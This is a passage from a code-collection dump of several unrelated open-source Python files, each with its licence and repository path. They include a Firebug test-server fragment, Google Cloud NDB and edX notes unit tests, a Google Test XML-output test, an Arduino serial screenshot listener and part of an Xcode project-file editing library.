= message phoneResponseEvent.set() def waitForPhoneResponse(): phoneResponseEvent.wait() phoneResponseEvent.clear() global phoneResponse return phoneResponse # ************************************************************************************************** def parseURL(url): """ Parses a URL into a tuple (host, path, args) where args is a dictionary.""" scheme, host, path, params, query, hash = urlparse(url) if not path: path = "/" args = parse_qs(query) escapedArgs = {} for name in args: if len(args[name]) == 1: escapedArgs[unquote(name)] = unquote(args[name][0]) else: escapedArgs[unquote(name)] = escapedSet = [] for item in args[name]: escapedSet.append(unquote(item)) return host, path, params, escapedArgs def 
escapeJavaScript(text): return text.replace("'", "\\'").replace("\n", "\\n").replace("\r", "") def getFormattedFile(path, args={}): return file(path).read() % args def getHostInfo(): import socket s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("getfirebug.com", 80)) hostName = s.getsockname()[0] s.close() return {"hostName": hostName, "port": webPort} # ************************************************************************************************** if __name__ == "__main__": serve()
bsd-3-clause
jonparrott/gcloud-python
ndb/tests/unit/test__datastore_types.py
4
2604
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest.mock import pytest from google.cloud.ndb import _datastore_types from google.cloud.ndb import exceptions class TestBlobKey: @staticmethod def test_constructor_bytes(): value = b"abc" blob_key = _datastore_types.BlobKey(value) assert blob_key._blob_key is value @staticmethod def test_constructor_none(): blob_key = _datastore_types.BlobKey(None) assert blob_key._blob_key is None @staticmethod def test_constructor_too_long(): value = b"a" * 2000 with pytest.raises(exceptions.BadValueError): _datastore_types.BlobKey(value) @staticmethod def test_constructor_bad_type(): value = {"a": "b"} with pytest.raises(exceptions.BadValueError): _datastore_types.BlobKey(value) @staticmethod def test___eq__(): blob_key1 = _datastore_types.BlobKey(b"abc") blob_key2 = _datastore_types.BlobKey(b"def") blob_key3 = _datastore_types.BlobKey(None) blob_key4 = b"ghi" blob_key5 = unittest.mock.sentinel.blob_key assert blob_key1 == blob_key1 assert not blob_key1 == blob_key2 assert not blob_key1 == blob_key3 assert not blob_key1 == blob_key4 assert not blob_key1 == blob_key5 @staticmethod def test___lt__(): blob_key1 = _datastore_types.BlobKey(b"abc") blob_key2 = _datastore_types.BlobKey(b"def") blob_key3 = _datastore_types.BlobKey(None) blob_key4 = b"ghi" blob_key5 = unittest.mock.sentinel.blob_key assert not blob_key1 < blob_key1 assert blob_key1 < blob_key2 with pytest.raises(TypeError): blob_key1 < blob_key3 
assert blob_key1 < blob_key4 with pytest.raises(TypeError): blob_key1 < blob_key5 @staticmethod def test___hash__(): value = b"289399038904ndkjndjnd02mx" blob_key = _datastore_types.BlobKey(value) assert hash(blob_key) == hash(value)
apache-2.0
analyseuc3m/ANALYSE-v1
common/djangoapps/terrain/stubs/tests/test_edxnotes.py
23
11674
""" Unit tests for stub EdxNotes implementation. """ import urlparse import json import unittest import requests from uuid import uuid4 from ..edxnotes import StubEdxNotesService class StubEdxNotesServiceTest(unittest.TestCase): """ Test cases for the stub EdxNotes service. """ def setUp(self): """ Start the stub server. """ super(StubEdxNotesServiceTest, self).setUp() self.server = StubEdxNotesService() dummy_notes = self._get_dummy_notes(count=5) self.server.add_notes(dummy_notes) self.addCleanup(self.server.shutdown) def _get_dummy_notes(self, count=1): """ Returns a list of dummy notes. """ return [self._get_dummy_note() for i in xrange(count)] # pylint: disable=unused-variable def _get_dummy_note(self): """ Returns a single dummy note. """ nid = uuid4().hex return { "id": nid, "created": "2014-10-31T10:05:00.000000", "updated": "2014-10-31T10:50:00.101010", "user": "dummy-user-id", "usage_id": "dummy-usage-id", "course_id": "dummy-course-id", "text": "dummy note text " + nid, "quote": "dummy note quote", "ranges": [ { "start": "/p[1]", "end": "/p[1]", "startOffset": 0, "endOffset": 10, } ], } def test_note_create(self): dummy_note = { "user": "dummy-user-id", "usage_id": "dummy-usage-id", "course_id": "dummy-course-id", "text": "dummy note text", "quote": "dummy note quote", "ranges": [ { "start": "/p[1]", "end": "/p[1]", "startOffset": 0, "endOffset": 10, } ], } response = requests.post(self._get_url("api/v1/annotations"), data=json.dumps(dummy_note)) self.assertTrue(response.ok) response_content = response.json() self.assertIn("id", response_content) self.assertIn("created", response_content) self.assertIn("updated", response_content) self.assertIn("annotator_schema_version", response_content) self.assertDictContainsSubset(dummy_note, response_content) def test_note_read(self): notes = self._get_notes() for note in notes: response = requests.get(self._get_url("api/v1/annotations/" + note["id"])) self.assertTrue(response.ok) self.assertDictEqual(note, 
response.json()) response = requests.get(self._get_url("api/v1/annotations/does_not_exist")) self.assertEqual(response.status_code, 404) def test_note_update(self): notes = self._get_notes() for note in notes: response = requests.get(self._get_url("api/v1/annotations/" + note["id"])) self.assertTrue(response.ok) self.assertDictEqual(note, response.json()) response = requests.get(self._get_url("api/v1/annotations/does_not_exist")) self.assertEqual(response.status_code, 404) def test_search(self): # Without user response = requests.get(self._get_url("api/v1/search")) self.assertEqual(response.status_code, 400) # get response with default page and page size response = requests.get(self._get_url("api/v1/search"), params={ "user": "dummy-user-id", "usage_id": "dummy-usage-id", "course_id": "dummy-course-id", }) self.assertTrue(response.ok) self._verify_pagination_info( response=response.json(), total_notes=5, num_pages=3, notes_per_page=2, start=0, current_page=1, next_page=2, previous_page=None ) # search notes with text that don't exist response = requests.get(self._get_url("api/v1/search"), params={ "user": "dummy-user-id", "usage_id": "dummy-usage-id", "course_id": "dummy-course-id", "text": "world war 2" }) self.assertTrue(response.ok) self._verify_pagination_info( response=response.json(), total_notes=0, num_pages=0, notes_per_page=0, start=0, current_page=1, next_page=None, previous_page=None ) def test_delete(self): notes = self._get_notes() response = requests.delete(self._get_url("api/v1/annotations/does_not_exist")) self.assertEqual(response.status_code, 404) for note in notes: response = requests.delete(self._get_url("api/v1/annotations/" + note["id"])) self.assertEqual(response.status_code, 204) remaining_notes = self.server.get_all_notes() self.assertNotIn(note["id"], [note["id"] for note in remaining_notes]) self.assertEqual(len(remaining_notes), 0) def test_update(self): note = self._get_notes()[0] response = 
requests.put(self._get_url("api/v1/annotations/" + note["id"]), data=json.dumps({ "text": "new test text" })) self.assertEqual(response.status_code, 200) updated_note = self._get_notes()[0] self.assertEqual("new test text", updated_note["text"]) self.assertEqual(note["id"], updated_note["id"]) self.assertItemsEqual(note, updated_note) response = requests.get(self._get_url("api/v1/annotations/does_not_exist")) self.assertEqual(response.status_code, 404) # pylint: disable=too-many-arguments def _verify_pagination_info( self, response, total_notes, num_pages, notes_per_page, current_page, previous_page, next_page, start ): """ Verify the pagination information. Argument: response: response from api total_notes: total notes in the response num_pages: total number of pages in response notes_per_page: number of notes in the response current_page: current page number previous_page: previous page number next_page: next page number start: start of the current page """ def get_page_value(url): """ Return page value extracted from url. 
""" if url is None: return None parsed = urlparse.urlparse(url) query_params = urlparse.parse_qs(parsed.query) page = query_params["page"][0] return page if page is None else int(page) self.assertEqual(response["total"], total_notes) self.assertEqual(response["num_pages"], num_pages) self.assertEqual(len(response["rows"]), notes_per_page) self.assertEqual(response["current_page"], current_page) self.assertEqual(get_page_value(response["previous"]), previous_page) self.assertEqual(get_page_value(response["next"]), next_page) self.assertEqual(response["start"], start) def test_notes_collection(self): """ Test paginated response of notes api """ # Without user response = requests.get(self._get_url("api/v1/annotations")) self.assertEqual(response.status_code, 400) # Without any pagination parameters response = requests.get(self._get_url("api/v1/annotations"), params={"user": "dummy-user-id"}) self.assertTrue(response.ok) self._verify_pagination_info( response=response.json(), total_notes=5, num_pages=3, notes_per_page=2, start=0, current_page=1, next_page=2, previous_page=None ) # With pagination parameters response = requests.get(self._get_url("api/v1/annotations"), params={ "user": "dummy-user-id", "page": 2, "page_size": 3 }) self.assertTrue(response.ok) self._verify_pagination_info( response=response.json(), total_notes=5, num_pages=2, notes_per_page=2, start=3, current_page=2, next_page=None, previous_page=1 ) def test_notes_collection_next_previous_with_one_page(self): """ Test next and previous urls of paginated response of notes api when number of pages are 1 """ response = requests.get(self._get_url("api/v1/annotations"), params={ "user": "dummy-user-id", "page_size": 10 }) self.assertTrue(response.ok) self._verify_pagination_info( response=response.json(), total_notes=5, num_pages=1, notes_per_page=5, start=0, current_page=1, next_page=None, previous_page=None ) def test_notes_collection_when_no_notes(self): """ Test paginated response of notes api when 
there's no note present """ # Delete all notes self.test_cleanup() # Get default page response = requests.get(self._get_url("api/v1/annotations"), params={"user": "dummy-user-id"}) self.assertTrue(response.ok) self._verify_pagination_info( response=response.json(), total_notes=0, num_pages=0, notes_per_page=0, start=0, current_page=1, next_page=None, previous_page=None ) def test_cleanup(self): response = requests.put(self._get_url("cleanup")) self.assertTrue(response.ok) self.assertEqual(len(self.server.get_all_notes()), 0) def test_create_notes(self): dummy_notes = self._get_dummy_notes(count=2) response = requests.post(self._get_url("create_notes"), data=json.dumps(dummy_notes)) self.assertTrue(response.ok) self.assertEqual(len(self._get_notes()), 7) response = requests.post(self._get_url("create_notes")) self.assertEqual(response.status_code, 400) def test_headers(self): note = self._get_notes()[0] response = requests.get(self._get_url("api/v1/annotations/" + note["id"])) self.assertTrue(response.ok) self.assertEqual(response.headers.get("access-control-allow-origin"), "*") response = requests.options(self._get_url("api/v1/annotations/")) self.assertTrue(response.ok) self.assertEqual(response.headers.get("access-control-allow-origin"), "*") self.assertEqual(response.headers.get("access-control-allow-methods"), "GET, POST, PUT, DELETE, OPTIONS") self.assertIn("X-CSRFToken", response.headers.get("access-control-allow-headers")) def _get_notes(self): """ Return a list of notes from the stub EdxNotes service. """ notes = self.server.get_all_notes() self.assertGreater(len(notes), 0, "Notes are empty.") return notes def _get_url(self, path): """ Construt a URL to the stub EdxNotes service. """ return "http://127.0.0.1:{port}/{path}/".format( port=self.server.port, path=path )
agpl-3.0
Chilastra-Reborn/Chilastra-source-code
utils/gmock-1.6.0/gtest/test/gtest_xml_outfiles_test.py
718
5312
#!/usr/bin/env python # # Copyright 2008, Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
"""Unit test for the gtest_xml_output module.""" __author__ = "keith.ray@gmail.com (Keith Ray)" import os from xml.dom import minidom, Node import gtest_test_utils import gtest_xml_test_utils GTEST_OUTPUT_SUBDIR = "xml_outfiles" GTEST_OUTPUT_1_TEST = "gtest_xml_outfile1_test_" GTEST_OUTPUT_2_TEST = "gtest_xml_outfile2_test_" EXPECTED_XML_1 = """<?xml version="1.0" encoding="UTF-8"?> <testsuites tests="1" failures="0" disabled="0" errors="0" time="*" name="AllTests"> <testsuite name="PropertyOne" tests="1" failures="0" disabled="0" errors="0" time="*"> <testcase name="TestSomeProperties" status="run" time="*" classname="PropertyOne" SetUpProp="1" TestSomeProperty="1" TearDownProp="1" /> </testsuite> </testsuites> """ EXPECTED_XML_2 = """<?xml version="1.0" encoding="UTF-8"?> <testsuites tests="1" failures="0" disabled="0" errors="0" time="*" name="AllTests"> <testsuite name="PropertyTwo" tests="1" failures="0" disabled="0" errors="0" time="*"> <testcase name="TestSomeProperties" status="run" time="*" classname="PropertyTwo" SetUpProp="2" TestSomeProperty="2" TearDownProp="2" /> </testsuite> </testsuites> """ class GTestXMLOutFilesTest(gtest_xml_test_utils.GTestXMLTestCase): """Unit test for Google Test's XML output functionality.""" def setUp(self): # We want the trailing '/' that the last "" provides in os.path.join, for # telling Google Test to create an output directory instead of a single file # for xml output. 
self.output_dir_ = os.path.join(gtest_test_utils.GetTempDir(), GTEST_OUTPUT_SUBDIR, "") self.DeleteFilesAndDir() def tearDown(self): self.DeleteFilesAndDir() def DeleteFilesAndDir(self): try: os.remove(os.path.join(self.output_dir_, GTEST_OUTPUT_1_TEST + ".xml")) except os.error: pass try: os.remove(os.path.join(self.output_dir_, GTEST_OUTPUT_2_TEST + ".xml")) except os.error: pass try: os.rmdir(self.output_dir_) except os.error: pass def testOutfile1(self): self._TestOutFile(GTEST_OUTPUT_1_TEST, EXPECTED_XML_1) def testOutfile2(self): self._TestOutFile(GTEST_OUTPUT_2_TEST, EXPECTED_XML_2) def _TestOutFile(self, test_name, expected_xml): gtest_prog_path = gtest_test_utils.GetTestExecutablePath(test_name) command = [gtest_prog_path, "--gtest_output=xml:%s" % self.output_dir_] p = gtest_test_utils.Subprocess(command, working_dir=gtest_test_utils.GetTempDir()) self.assert_(p.exited) self.assertEquals(0, p.exit_code) # TODO(wan@google.com): libtool causes the built test binary to be # named lt-gtest_xml_outfiles_test_ instead of # gtest_xml_outfiles_test_. To account for this possibillity, we # allow both names in the following code. We should remove this # hack when Chandler Carruth's libtool replacement tool is ready. output_file_name1 = test_name + ".xml" output_file1 = os.path.join(self.output_dir_, output_file_name1) output_file_name2 = 'lt-' + output_file_name1 output_file2 = os.path.join(self.output_dir_, output_file_name2) self.assert_(os.path.isfile(output_file1) or os.path.isfile(output_file2), output_file1) expected = minidom.parseString(expected_xml) if os.path.isfile(output_file1): actual = minidom.parse(output_file1) else: actual = minidom.parse(output_file2) self.NormalizeXml(actual.documentElement) self.AssertEquivalentNodes(expected.documentElement, actual.documentElement) expected.unlink() actual.unlink() if __name__ == "__main__": os.environ["GTEST_STACK_TRACE_DEPTH"] = "0" gtest_test_utils.Main()
agpl-3.0
jamesbowman/gd2-lib
scripts/arduino_listener.py
1
4016
import os import sys import serial import struct import array import time import binascii def crc(s): # CRC-32 of string s return binascii.crc32(s) & 0xffffffff from PIL import Image, ImageChops def fetch8(pix, x, y, ser): difference = ord(ser.read(1)) if (difference & 1) == 0: assert 0, "difference is %02x\n" % difference for i in range(8): if (difference >> i) & 1: (b, g, r) = list(ser.read(3)) pix[x + i, y] = (r, g, b) if __name__ == '__main__': import sys, getopt try: optlist, args = getopt.getopt(sys.argv[1:], "vh:s:a:") except getopt.GetoptError as reason: print(reason) print print('usage: listenscreenshot.py [options]') print print sys.exit(1) optdict = dict(optlist) verbose = '-v' in optdict assetfile = optdict.get('-a', None) if '-s' in optdict: speed = int(optdict['-s']) else: speed = 1000000 port = optdict.get('-h', "/dev/ttyUSB0") if verbose: print('Opening %s at %d' % (port, speed)) ser = serial.Serial(port, speed) ser.setDTR(0) time.sleep(0.01) ser.setDTR(1) l = b'' ESCAPE = "%H%" log = open("log", "w") frame = 0 if 0: grid = Image.fromstring("L", (1280, 720), 360 * ( ((chr(255) + chr(240)) * 640) + ((chr(240) + chr(224)) * 640))).convert("RGB") try: if assetfile is not None: srcf = open(assetfile, "rb") totsize = os.path.getsize(assetfile) except IOError: srcf = None inputs = open("inputs") while True: s = ser.read(1) if s == b'\n': l = b'' else: l = (l + s)[-3:] if l == ESCAPE: print break chk = s[0] if (chk == 0xa4): print("[Synced]") ser.write(b"!") elif (chk == 0xa5): (w,h) = struct.unpack("HH", ser.read(4)) filename = "%06d.png" % frame sys.stdout.flush() im = Image.new("RGBA", (w, h)) pix = im.load() total = 0 t0 = time.time() ser.timeout = 0.5 for y in range(-2, h): sys.stdout.write("\rdumping %dx%d frame to %s [%-50s]" % (w, h, filename, ("#" * (50 * y // h )))) ser.write(b"!") (licrc, ) = struct.unpack("I", ser.read(4)) li = ser.read(4 * w) if licrc != crc(li): print("\nCRC mismatch line %d %08x %08x\n" % (y, licrc, crc(li))) strip = 
Image.frombytes("RGBA", (w, 1), li) im.paste(strip, (0, max(0, y))) # print('%.1f' % (time.time() - t0)) print(' %08x' % crc(im.tobytes())) ser.timeout = 0 (b,g,r,a) = im.split() im = Image.merge("RGB", (r, g, b)) if 1: im.save(filename) else: im = im.resize((im.size[0] * 2, im.size[1] * 2)) full = Image.new("RGB", (1280, 720)) full.paste(im, ((1280 - im.size[0]) / 2, (680 - im.size[1]) / 2)) ImageChops.multiply(grid, full).save(filename) frame += 1 elif False and (chk == 0xa6): d = srcf.read(0x30) print("\rtransfer ", "[" + ("#" * (72 * srcf.tell() / totsize)).ljust(72) + "]",) while len(d) & 3: d += chr(0) ser.write(chr(len(d)) + d) elif (chk == 0xa7): for line in inputs: if line.startswith("INPUTS "): break if not line.startswith("INPUTS "): sys.exit(0) for v in line.split()[1:]: ser.write(chr(int(v, 16))) else: # sys.stdout.write(s.decode('UTF-8')) print(s) sys.stdout.flush() # log.write(s.decode('UTF-8'))
bsd-3-clause
PodRepo/firefox-ios
scripts/mod_pbxproj.py
54
52734
# Copyright 2012 Calvin Rien # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # A pbxproj file is an OpenStep format plist # {} represents dictionary of key=value pairs delimited by ; # () represents list of values delimited by , # file starts with a comment specifying the character type # // !$*UTF8*$! # when adding a file to a project, create the PBXFileReference # add the PBXFileReference's guid to a group # create a PBXBuildFile with the PBXFileReference's guid # add the PBXBuildFile to the appropriate build phase # when adding a header search path add # HEADER_SEARCH_PATHS = "path/**"; # to each XCBuildConfiguration object # Xcode4 will read either a OpenStep or XML plist. # this script uses `plutil` to validate, read and write # the pbxproj file. 
Plutil is available in OS X 10.2 and higher # Plutil can't write OpenStep plists, so I save as XML import datetime import json import ntpath import os import plistlib import re import shutil import subprocess import uuid from UserDict import IterableUserDict from UserList import UserList regex = '[a-zA-Z0-9\\._/-]*' class PBXEncoder(json.JSONEncoder): def default(self, obj): """Tests the input object, obj, to encode as JSON.""" if isinstance(obj, (PBXList, PBXDict)): return obj.data return json.JSONEncoder.default(self, obj) class PBXDict(IterableUserDict): def __init__(self, d=None): if d: d = dict([(PBXType.Convert(k), PBXType.Convert(v)) for k, v in d.items()]) IterableUserDict.__init__(self, d) def __setitem__(self, key, value): IterableUserDict.__setitem__(self, PBXType.Convert(key), PBXType.Convert(value)) def remove(self, key): self.data.pop(PBXType.Convert(key), None) class PBXList(UserList): def __init__(self, l=None): if isinstance(l, basestring): UserList.__init__(self) self.add(l) return elif l: l = [PBXType.Convert(v) for v in l] UserList.__init__(self, l) def add(self, value): value = PBXType.Convert(value) if value in self.data: return False self.data.append(value) return True def remove(self, value): value = PBXType.Convert(value) if value in self.data: self.data.remove(value) return True return False def __setitem__(self, key, value): UserList.__setitem__(self, PBXType.Convert(key), PBXType.Convert(value)) class PBXType(PBXDict): def __init__(self, d=None): PBXDict.__init__(self, d) if 'isa' not in self: self['isa'] = self.__class__.__name__ self.id = None @staticmethod def Convert(o): if isinstance(o, list): return PBXList(o) elif isinstance(o, dict): isa = o.get('isa') if not isa: return PBXDict(o) cls = globals().get(isa) if cls and issubclass(cls, PBXType): return cls(o) print 'warning: unknown PBX type: %s' % isa return PBXDict(o) else: return o @staticmethod def IsGuid(o): return re.match('^[A-F0-9]{24}$', str(o)) @classmethod def 
GenerateId(cls): return ''.join(str(uuid.uuid4()).upper().split('-')[1:]) @classmethod def Create(cls, *args, **kwargs): return cls(*args, **kwargs) class PBXFileReference(PBXType): def __init__(self, d=None): PBXType.__init__(self, d) self.build_phase = None types = { '.a': ('archive.ar', 'PBXFrameworksBuildPhase'), '.app': ('wrapper.application', None), '.s': ('sourcecode.asm', 'PBXSourcesBuildPhase'), '.c': ('sourcecode.c.c', 'PBXSourcesBuildPhase'), '.cpp': ('sourcecode.cpp.cpp', 'PBXSourcesBuildPhase'), '.framework': ('wrapper.framework', 'PBXFrameworksBuildPhase'), '.h': ('sourcecode.c.h', None), '.hpp': ('sourcecode.c.h', None), '.swift': ('sourcecode.swift', 'PBXSourcesBuildPhase'), '.icns': ('image.icns', 'PBXResourcesBuildPhase'), '.m': ('sourcecode.c.objc', 'PBXSourcesBuildPhase'), '.j': ('sourcecode.c.objc', 'PBXSourcesBuildPhase'), '.mm': ('sourcecode.cpp.objcpp', 'PBXSourcesBuildPhase'), '.nib': ('wrapper.nib', 'PBXResourcesBuildPhase'), '.plist': ('text.plist.xml', 'PBXResourcesBuildPhase'), '.json': ('text.json', 'PBXResourcesBuildPhase'), '.png': ('image.png', 'PBXResourcesBuildPhase'), '.rtf': ('text.rtf', 'PBXResourcesBuildPhase'), '.tiff': ('image.tiff', 'PBXResourcesBuildPhase'), '.txt': ('text', 'PBXResourcesBuildPhase'), '.xcodeproj': ('wrapper.pb-project', None), '.xib': ('file.xib', 'PBXResourcesBuildPhase'), '.strings': ('text.plist.strings', 'PBXResourcesBuildPhase'), '.bundle': ('wrapper.plug-in', 'PBXResourcesBuildPhase'), '.dylib': ('compiled.mach-o.dylib', 'PBXFrameworksBuildPhase') } trees = [ '<absolute>', '<group>', 'BUILT_PRODUCTS_DIR', 'DEVELOPER_DIR', 'SDKROOT', 'SOURCE_ROOT', ] def guess_file_type(self, ignore_unknown_type=False): self.remove('explicitFileType') self.remove('lastKnownFileType') name = os.path.split(self.get('path'))[1] ext = os.path.splitext(name)[1] if os.path.isdir(self.get('path')) and ext != '.framework' and ext != '.bundle': f_type = 'folder' build_phase = None ext = '' else: f_type, build_phase = 
PBXFileReference.types.get(ext, ('?', 'PBXResourcesBuildPhase')) self['lastKnownFileType'] = f_type self.build_phase = build_phase if f_type == '?' and not ignore_unknown_type: print 'unknown file extension: %s' % ext print 'please add extension and Xcode type to PBXFileReference.types' return f_type def set_file_type(self, ft): self.remove('explicitFileType') self.remove('lastKnownFileType') self['explicitFileType'] = ft @classmethod def Create(cls, os_path, name=None, tree='SOURCE_ROOT', ignore_unknown_type=False): if tree not in cls.trees: print 'Not a valid sourceTree type: %s' % tree return None fr = cls() fr.id = cls.GenerateId() fr['path'] = os_path if name is None: fr['name'] = os.path.split(os_path)[1] else: fr['name'] = name fr['sourceTree'] = '<absolute>' if os.path.isabs(os_path) else tree fr.guess_file_type(ignore_unknown_type=ignore_unknown_type) return fr class PBXBuildFile(PBXType): def set_weak_link(self, weak=False): k_settings = 'settings' k_attributes = 'ATTRIBUTES' s = self.get(k_settings) if not s: if weak: self[k_settings] = PBXDict({k_attributes: PBXList(['Weak'])}) return True atr = s.get(k_attributes) if not atr: if weak: atr = PBXList() else: return False if weak: atr.add('Weak') else: atr.remove('Weak') self[k_settings][k_attributes] = atr return True def add_compiler_flag(self, flag): k_settings = 'settings' k_attributes = 'COMPILER_FLAGS' if k_settings not in self: self[k_settings] = PBXDict() if k_attributes not in self[k_settings]: self[k_settings][k_attributes] = flag return True flags = self[k_settings][k_attributes].split(' ') if flag in flags: return False flags.append(flag) self[k_settings][k_attributes] = ' '.join(flags) @classmethod def Create(cls, file_ref, weak=False): if isinstance(file_ref, PBXFileReference) or isinstance(file_ref, PBXVariantGroup): file_ref = file_ref.id bf = cls() bf.id = cls.GenerateId() bf['fileRef'] = file_ref if weak: bf.set_weak_link(True) return bf class PBXGroup(PBXType): def add_child(self, ref): 
if not isinstance(ref, PBXDict): return None isa = ref.get('isa') if isa != 'PBXFileReference' and isa != 'PBXGroup' and isa != 'PBXVariantGroup': return None if 'children' not in self: self['children'] = PBXList() self['children'].add(ref.id) return ref.id def remove_child(self, id): if 'children' not in self: self['children'] = PBXList() return if not PBXType.IsGuid(id): id = id.id self['children'].remove(id) def has_child(self, id): if 'children' not in self: self['children'] = PBXList() return False if not PBXType.IsGuid(id): id = id.id return id in self['children'] def get_name(self): path_name = os.path.split(self.get('path', ''))[1] return self.get('name', path_name) @classmethod def Create(cls, name, path=None, tree='SOURCE_ROOT'): grp = cls() grp.id = cls.GenerateId() grp['name'] = name grp['children'] = PBXList() if path: grp['path'] = path grp['sourceTree'] = tree else: grp['sourceTree'] = '<group>' return grp class PBXNativeTarget(PBXType): pass class PBXProject(PBXType): pass class PBXContainerItemProxy(PBXType): pass class PBXReferenceProxy(PBXType): pass class PBXVariantGroup(PBXType): def add_child(self, ref): if not isinstance(ref, PBXDict): return None isa = ref.get('isa') if isa != 'PBXFileReference': return None if 'children' not in self: self['children'] = PBXList() self['children'].add(ref.id) return ref.id def remove_child(self, id): if 'children' not in self: self['children'] = PBXList() return if not PBXType.IsGuid(id): id = id.id self['children'].remove(id) def has_child(self, id): if 'children' not in self: self['children'] = PBXList() return False if not PBXType.IsGuid(id): id = id.id return id in self['children'] @classmethod def Create(cls, name, path=None, tree='SOURCE_ROOT'): grp = cls() grp.id = cls.GenerateId() grp['name'] = name grp['children'] = PBXList() if path: grp['path'] = path grp['sourceTree'] = tree else: grp['sourceTree'] = '<group>' return grp class PBXTargetDependency(PBXType): pass class PBXAggregateTarget(PBXType): 
pass class PBXHeadersBuildPhase(PBXType): pass class PBXBuildPhase(PBXType): def add_build_file(self, bf): if bf.get('isa') != 'PBXBuildFile': return False if 'files' not in self: self['files'] = PBXList() self['files'].add(bf.id) return True def remove_build_file(self, id): if 'files' not in self: self['files'] = PBXList() return self['files'].remove(id) def has_build_file(self, id): if 'files' not in self: self['files'] = PBXList() return False if not PBXType.IsGuid(id): id = id.id return id in self['files'] class PBXFrameworksBuildPhase(PBXBuildPhase): pass class PBXResourcesBuildPhase(PBXBuildPhase): pass class PBXShellScriptBuildPhase(PBXBuildPhase): @classmethod def Create(cls, script, shell="/bin/sh", files=[], input_paths=[], output_paths=[], show_in_log = '0'): bf = cls() bf.id = cls.GenerateId() bf['files'] = files bf['inputPaths'] = input_paths bf['outputPaths'] = output_paths bf['runOnlyForDeploymentPostprocessing'] = '0'; bf['shellPath'] = shell bf['shellScript'] = script bf['showEnvVarsInLog'] = show_in_log return bf class PBXSourcesBuildPhase(PBXBuildPhase): pass class PBXCopyFilesBuildPhase(PBXBuildPhase): pass class XCBuildConfiguration(PBXType): def add_search_paths(self, paths, base, key, recursive=True, escape=True): modified = False if not isinstance(paths, list): paths = [paths] if base not in self: self[base] = PBXDict() for path in paths: if recursive and not path.endswith('/**'): path = os.path.join(path, '**') if key not in self[base]: self[base][key] = PBXList() elif isinstance(self[base][key], basestring): self[base][key] = PBXList(self[base][key]) if escape: if self[base][key].add('"%s"' % path): # '\\"%s\\"' % path modified = True else: if self[base][key].add(path): # '\\"%s\\"' % path modified = True return modified def add_header_search_paths(self, paths, recursive=True): return self.add_search_paths(paths, 'buildSettings', 'HEADER_SEARCH_PATHS', recursive=recursive) def add_library_search_paths(self, paths, recursive=True): return 
self.add_search_paths(paths, 'buildSettings', 'LIBRARY_SEARCH_PATHS', recursive=recursive) def add_framework_search_paths(self, paths, recursive=True): return self.add_search_paths(paths, 'buildSettings', 'FRAMEWORK_SEARCH_PATHS', recursive=recursive) def add_other_cflags(self, flags): return self.add_flag('OTHER_CFLAGS', flags) def add_other_ldflags(self, flags): return self.add_flag('OTHER_LDFLAGS', flags) def add_flag(self, key, flags): modified = False base = 'buildSettings' if isinstance(flags, basestring): flags = PBXList(flags) if base not in self: self[base] = PBXDict() for flag in flags: if key not in self[base]: self[base][key] = PBXList() elif isinstance(self[base][key], basestring): self[base][key] = PBXList(self[base][key]) if self[base][key].add(flag): self[base][key] = [e for e in self[base][key] if e] modified = True return modified def remove_flag(self, key, flags): modified = False base = 'buildSettings' if isinstance(flags, basestring): flags = PBXList(flags) if base in self: # there are flags, so we can "remove" something for flag in flags: if key not in self[base]: return False elif isinstance(self[base][key], basestring): self[base][key] = PBXList(self[base][key]) if self[base][key].remove(flag): self[base][key] = [e for e in self[base][key] if e] modified = True if len(self[base][key]) == 0: self[base].pop(key, None) return modified def remove_other_ldflags(self, flags): return self.remove_flag('OTHER_LD_FLAGS', flags) class XCConfigurationList(PBXType): pass class XcodeProject(PBXDict): plutil_path = 'plutil' special_folders = ['.bundle', '.framework', '.xcodeproj'] def __init__(self, d=None, path=None): if not path: path = os.path.join(os.getcwd(), 'project.pbxproj') self.pbxproj_path = os.path.abspath(path) self.source_root = os.path.abspath(os.path.join(os.path.split(path)[0], '..')) IterableUserDict.__init__(self, d) self.data = PBXDict(self.data) self.objects = self.get('objects') self.modified = False root_id = self.get('rootObject') 
